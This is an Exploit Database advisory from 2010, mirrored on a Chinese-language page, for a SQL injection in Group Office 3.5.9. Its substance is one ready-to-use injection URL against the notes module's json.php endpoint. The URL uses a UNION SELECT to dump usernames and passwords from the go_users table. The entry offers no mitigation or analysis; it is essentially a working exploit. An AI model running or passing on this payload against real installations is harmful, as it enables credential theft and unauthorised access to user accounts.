Group Office 3.5.9 – SQL Injection

• Exploit Database
• 15 阅读

• 作者： ViciOuS
  日期： 2010-09-13
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14988/

• =====================================================================================
  Group Office (/notes/json.php?task=category&category_id) SQL Injection Vulnerability
  =====================================================================================
  
  ########################################################################################
  
  Author : ViciOuS
  Author Web Page :http://www.sabotaj.in
  Email : vicious[at]sabotaj.in
  Script Page : http://www.group-office.com
  
  ########################################################################################
   
  Sql Injection :
  
  http://localhost/www/groupoffice-com-3.5.9/modules/notes/json.php?task=category&category_id=999999 union(select 1,concat_ws(0x3a,username,password),3,4+from+go_users)--
  
  ########################################################################################
  Thanks WwW.sabotaj.iN
  ########################################################################################